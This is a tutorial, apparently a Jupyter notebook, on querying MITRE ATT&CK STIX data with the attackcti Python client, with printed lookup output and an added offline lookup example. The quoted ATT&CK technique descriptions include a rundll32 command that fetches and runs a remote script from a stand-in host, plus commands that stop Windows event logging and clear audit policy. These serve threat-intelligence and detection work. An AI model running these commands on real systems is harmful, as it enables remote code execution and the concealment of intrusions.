# Filtering and Looking Up STIX Objects in ATT&CK
## Import ATT&CK API Client

```python
from attackcti import attack_client
```
## Import Extra Libraries

```python
from pandas import *  # pandas is not used in this section
import logging

# Silence the TAXII client's log noise while the collections are fetched
logging.getLogger('taxii2client').setLevel(logging.CRITICAL)
```
## Initialize ATT&CK Client Variable

```python
lift = attack_client()
```
## Get Technique by Name (TAXII)

You can use a custom method in the `attack_client` class to get a technique across all the matrices by its name. The match is case sensitive.

```python
technique_name = lift.get_technique_by_name('Rundll32')
technique_name
```

Output (two `AttackPattern` objects: the current sub-technique T1218.011 and the revoked legacy T1085 entry, which the lookup still returns):
[AttackPattern(type='attack-pattern', id='attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-01-23T18:03:46.248Z', modified='2021-10-14T21:45:53.057Z', name='Rundll32', description='Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. 
As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1218/011', external_id='T1218.011'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'), ExternalReference(source_name='Attackify Rundll32.exe Obscurity', description='Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.', url='https://www.attackify.com/blog/rundll32_execution_order/'), ExternalReference(source_name='Github NoRunDll', description='gtworek. (2019, December 17). NoRunDll. 
Retrieved August 23, 2021.', url='https://github.com/gtworek/PSBits/tree/master/NoRunDll')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Gareth Phillips, Seek Ltd.', 'Casey Smith', 'Ricardo Dias'], x_mitre_data_sources=['File: File Metadata', 'Process: Process Creation', 'Command: Command Execution', 'Module: Module Load'], x_mitre_defense_bypassed=['Digital Certificate Validation', 'Application control', 'Anti-virus'], x_mitre_detection='Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.1'),
AttackPattern(type='attack-pattern', id='attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', created='2017-05-31T21:31:06.045Z', modified='2020-01-31T19:01:41.919Z', name='Rundll32', revoked=True, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1085', external_id='T1085'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')])]
## Get Data Sources from All Techniques (TAXII)

You can also get all the data sources available in ATT&CK. Currently the only techniques with data sources are the ones in Enterprise ATT&CK.

```python
data_sources = lift.get_data_sources()
len(data_sources)
```

```text
38
```
```python
for ds in data_sources:
    print(ds['name'])
```

```text
Internet Scan
Certificate
Domain Name
Volume
Group
Cluster
Logon Session
Network Share
Container
Active Directory
Driver
Instance
Network Traffic
File
Firewall
Persona
Cloud Service
Named Pipe
Service
Windows Registry
Command
Snapshot
Module
Sensor Health
Application Log
Script
Cloud Storage
Drive
Kernel
Pod
Process
Scheduled Job
Web Credential
Malware Repository
User Account
WMI
Image
Firmware
```
## Get Any STIX Object by ID (TAXII)

You can get any STIX object by its ATT&CK ID across all the matrices. The ID is case sensitive.

You can use the following STIX object types:

- `attack-pattern` (techniques)
- `course-of-action` (mitigations)
- `intrusion-set` (groups)
- `malware`
- `tool`

```python
object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1103')
object_by_id
```

Output (T1103, AppInit DLLs, is itself a revoked object; revoked objects are still returned):
[AttackPattern(type='attack-pattern', id='attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41', created='2017-05-31T21:31:15.409Z', modified='2020-11-10T18:29:30.379Z', name='AppInit DLLs', revoked=True, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1103', external_id='T1103'), ExternalReference(source_name='Elastic Process Injection July 2017', description='Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.', url='https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process'), ExternalReference(source_name='AppInit Registry', description='Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.', url='https://support.microsoft.com/en-us/kb/197571'), ExternalReference(source_name='AppInit Secure Boot', description='Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.', url='https://msdn.microsoft.com/en-us/library/dn280412'), ExternalReference(source_name='TechNet Autoruns', description='Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', url='https://technet.microsoft.com/en-us/sysinternals/bb963902')])]
## Get Any Group by Alias (TAXII)

You can get any group by its `aliases` property across all the matrices. The alias is case sensitive.

```python
group_name = lift.get_group_by_alias('Cozy Bear')
group_name
```

Output (the APT29 intrusion set, G0016, whose aliases include Cozy Bear):
[IntrusionSet(type='intrusion-set', id='intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:52.748Z', modified='2021-10-16T00:59:58.792Z', name='APT29', description="[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. 
Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)", aliases=['APT29', 'NobleBaron', 'Dark Halo', 'StellarParticle', 'NOBELIUM', 'UNC2452', 'YTTRIUM', 'The Dukes', 'Cozy Bear', 'CozyDuke'], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/groups/G0016', external_id='G0016'), ExternalReference(source_name='APT29', description='(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)'), ExternalReference(source_name='NobleBaron', description='(Citation: SentinelOne NobleBaron June 2021)'), ExternalReference(source_name='Dark Halo', description='(Citation: Volexity SolarWinds)'), ExternalReference(source_name='StellarParticle', description='(Citation: CrowdStrike SUNSPOT Implant January 2021)'), ExternalReference(source_name='NOBELIUM', description='(Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021)'), ExternalReference(source_name='UNC2452', description='(Citation: FireEye SUNBURST Backdoor December 2020)'), ExternalReference(source_name='YTTRIUM', description='(Citation: Microsoft Unidentified Dec 2018)'), ExternalReference(source_name='The Dukes', description='(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)'), ExternalReference(source_name='Cozy Bear', description='(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity 
Advisory SVR TTP May 2021)'), ExternalReference(source_name='CozyDuke', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='White House Imposing Costs RU Gov April 2021', description='White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.', url='https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'), ExternalReference(source_name='UK Gov Malign RIS Activity April 2021', description='UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', url='https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'), ExternalReference(source_name='F-Secure The Dukes', description='F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', url='https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'), ExternalReference(source_name='GRIZZLY STEPPE JAR', description='Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.', url='https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'), ExternalReference(source_name='Crowdstrike DNC June 2016', description='Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.', url='https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/'), ExternalReference(source_name='UK Gov UK Exposes Russia SolarWinds April 2021', description='UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . 
Retrieved April 16, 2021.', url='https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'), ExternalReference(source_name='NSA Joint Advisory SVR SolarWinds April 2021', description='NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.', url='https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF'), ExternalReference(source_name='UK NSCS Russia SolarWinds April 2021', description='UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', url='https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'), ExternalReference(source_name='FireEye SUNBURST Backdoor December 2020', description='FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.', url='https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html'), ExternalReference(source_name='MSTIC NOBELIUM Mar 2021', description='Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.', url='https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/'), ExternalReference(source_name='CrowdStrike SUNSPOT Implant January 2021', description='CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.', url='https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/'), ExternalReference(source_name='Volexity SolarWinds', description='Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. 
Retrieved December 29, 2020.', url='https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/'), ExternalReference(source_name='Cybersecurity Advisory SVR TTP May 2021', description='NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.', url='https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf'), ExternalReference(source_name='FireEye APT29 Nov 2018', description='Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.', url='https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html'), ExternalReference(source_name='ESET Dukes October 2019', description='Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.', url='https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf'), ExternalReference(source_name='NCSC APT29 July 2020', description='National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.', url='https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf'), ExternalReference(source_name='SentinelOne NobleBaron June 2021', description='Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.', url='https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/'), ExternalReference(source_name='MSTIC NOBELIUM May 2021', description='Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. 
Retrieved May 28, 2021.', url='https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/'), ExternalReference(source_name='MSTIC Nobelium Toolset May 2021', description='MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.', url='https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/'), ExternalReference(source_name='MSRC Nobelium June 2021', description='MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.', url='https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/'), ExternalReference(source_name='Microsoft Unidentified Dec 2018', description='Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.', url='https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Daniyal Naeem, BT Security', 'Matt Brenton, Zurich Insurance Group', 'Katie Nickels, Red Canary'], x_mitre_version='2.1')]
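The three look-ups above (by name, by ATT&CK ID, by alias) reduce to filtering on a few STIX fields. The following is an added example, not attackcti's code, that reimplements them over constructed sample objects so they run without a TAXII connection, and adds the case-insensitive match and the revoked-object filter a practitioner usually wants:

```python
"""Offline look-ups over ATT&CK STIX objects (added example, constructed data).

Mirrors get_object_by_attack_id(), get_technique_by_name() and
get_group_by_alias() over plain dicts (e.g. json.loads(obj.serialize()) of a
stix2 object, or objects read from a saved ATT&CK bundle).
"""
from typing import Dict, Iterable, List, Optional

# Constructed sample objects. Names and ATT&CK IDs copy the page's examples
# (T1218.011, the revoked T1085, APT29/G0016); all other fields are trimmed
# to what the look-ups need.
SAMPLE_OBJECTS: List[Dict] = [
    {
        "type": "attack-pattern",
        "id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
        "name": "Rundll32",
        "revoked": False,
        "external_references": [
            {"source_name": "mitre-attack", "external_id": "T1218.011"},
        ],
    },
    {
        "type": "attack-pattern",
        "id": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5",
        "name": "Rundll32",
        "revoked": True,  # legacy T1085, kept in the bundle as revoked
        "external_references": [
            {"source_name": "mitre-attack", "external_id": "T1085"},
        ],
    },
    {
        "type": "intrusion-set",
        "id": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542",
        "name": "APT29",
        "aliases": ["APT29", "NOBELIUM", "The Dukes", "Cozy Bear"],
        "revoked": False,
        "external_references": [
            {"source_name": "mitre-attack", "external_id": "G0016"},
        ],
    },
]


def attack_id(obj: Dict) -> Optional[str]:
    """ATT&CK ID (T1234, G0016, ...) from the 'mitre-attack' external
    reference, or None if the object carries none."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def is_current(obj: Dict) -> bool:
    """ATT&CK keeps revoked and deprecated objects in the bundle; drop them
    unless you are deliberately tracing history."""
    return not obj.get("revoked", False) and not obj.get("x_mitre_deprecated", False)


def get_object_by_attack_id(objects: Iterable[Dict], stix_type: str,
                            wanted_id: str) -> List[Dict]:
    """Objects of stix_type whose ATT&CK ID equals wanted_id (case sensitive,
    like the client method; revoked objects are returned too)."""
    return [o for o in objects if o["type"] == stix_type and attack_id(o) == wanted_id]


def get_technique_by_name(objects: Iterable[Dict], name: str,
                          case_sensitive: bool = True,
                          include_revoked: bool = True) -> List[Dict]:
    """Techniques named `name`. The defaults reproduce the page's behaviour
    (the 'Rundll32' query returns both T1218.011 and revoked T1085);
    case_sensitive=False and include_revoked=False tighten the match."""
    want = name if case_sensitive else name.casefold()
    matches = []
    for o in objects:
        if o["type"] != "attack-pattern":
            continue
        have = o["name"] if case_sensitive else o["name"].casefold()
        if have == want and (include_revoked or is_current(o)):
            matches.append(o)
    return matches


def get_group_by_alias(objects: Iterable[Dict], alias: str,
                       case_sensitive: bool = True) -> List[Dict]:
    """Non-revoked groups whose aliases list contains `alias`. A group's own
    name is normally among its aliases (APT29 above), so a name query works."""
    want = alias if case_sensitive else alias.casefold()
    matches = []
    for o in objects:
        if o["type"] != "intrusion-set" or not is_current(o):
            continue
        names = o.get("aliases", [])
        if not case_sensitive:
            names = [n.casefold() for n in names]
        if want in names:
            matches.append(o)
    return matches
```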
## Get Relationships by Any Object (TAXII)

You can get the relationships of type `uses` and `mitigates` that ATT&CK defines for a specific object, across all the matrices.

```python
groups = lift.get_groups()
one_group = groups[0]
relationships = lift.get_relationships_by_object(one_group)
relationships[0]
```

Output (the first relationship found for the first group returned):
Relationship(type='relationship', id='relationship--6bbd0299-4e8b-4d31-83c4-c690e43294c0', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-10-15T18:47:18.472Z', modified='2021-10-15T18:47:18.472Z', relationship_type='uses', description='[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for unsecured SSH keys.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Trend Micro TeamTNT)', source_ref='intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca', target_ref='attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf', revoked=False, external_references=[ExternalReference(source_name='Cado Security TeamTNT Worm August 2020', description='Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.', url='https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/'), ExternalReference(source_name='Trend Micro TeamTNT', description='Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.', url='https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'])
## Get All Techniques with Mitigations (TAXII)

The difference between this function and `get_techniques()` is that `get_techniques_mitigated_by_mitigations()` returns only the techniques that have mitigations mapped to them.

```python
techniques_mitigated = lift.get_techniques_mitigated_by_mitigations()
len(techniques_mitigated)
```

```text
661
```

```python
techniques_mitigated[0]
```

Output:
AttackPattern(type='attack-pattern', id='attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-10-12T20:02:31.866Z', modified='2021-10-16T01:50:40.276Z', name='Resource Forking', description='Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1564/009', external_id='T1564.009'), ExternalReference(source_name='macOS Hierarchical File System Overview', description='Tenon. (n.d.). 
Retrieved October 12, 2021.', url='http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553'), ExternalReference(source_name='Resource and Data Forks', description='Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.', url='https://flylib.com/books/en/4.395.1.192/1/'), ExternalReference(source_name='ELC Extended Attributes', description="Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.", url='https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/'), ExternalReference(source_name='sentinellabs resource named fork 2020', description='Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.', url='https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/'), ExternalReference(source_name='tau bundlore erika noerenberg 2020', description='Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.', url='https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Jaron Bradley @jbradley89', 'Ivan Sinyakov'], x_mitre_data_sources=['File: File Creation', 'Process: Process Creation', 'File: File Metadata', 'Command: Command Execution'], x_mitre_defense_bypassed=['Notarization; Gatekeeper'], x_mitre_detection='Identify files with the <code>com.apple.ResourceFork</code> extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['macOS'], x_mitre_version='1.0')
## Get Techniques Used by Software (TAXII)

This function returns the techniques used by a specific software STIX object (a `tool` or `malware` object).

```python
all_software = lift.get_software()
one_software = all_software[0]
software_techniques = lift.get_techniques_used_by_software(one_software)
software_techniques[0]
```

Output:
AttackPattern(type='attack-pattern', id='attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-02-21T20:46:36.688Z', modified='2021-10-19T13:37:30.534Z', name='Disable Windows Event Logging', description='Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\\Local Policies\\Audit Policy</code> for basic audit policy settings or <code>Security Settings\\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: <code>Stop-Service -Name EventLog</code>.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. 
For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], revoked=False, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1562/002', external_id='T1562.002'), ExternalReference(source_name='Windows Log Events', description='Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.', url='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/'), ExternalReference(source_name='EventLog_Core_Technologies', description='Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.', url='https://www.coretechnologies.com/blog/windows-services/eventlog/'), ExternalReference(source_name='Audit_Policy_Microsoft', description='Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.', url='https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy'), ExternalReference(source_name='Advanced_sec_audit_policy_settings', description='Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.', url='https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings'), ExternalReference(source_name='auditpol', description='Jason Gerend, et al. (2017, October 16). auditpol. 
Retrieved September 1, 2021.', url='https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol'), ExternalReference(source_name='Disable_Win_Event_Logging', description=' dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.', url='https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging'), ExternalReference(source_name='auditpol.exe_STRONTIC', description='STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.', url='https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html'), ExternalReference(source_name='T1562.002_redcanaryco', description='redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.', url='https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md'), ExternalReference(source_name='def_ev_win_event_logging', description='Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.', url='https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/'), ExternalReference(source_name='evt_log_tampering', description='svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. 
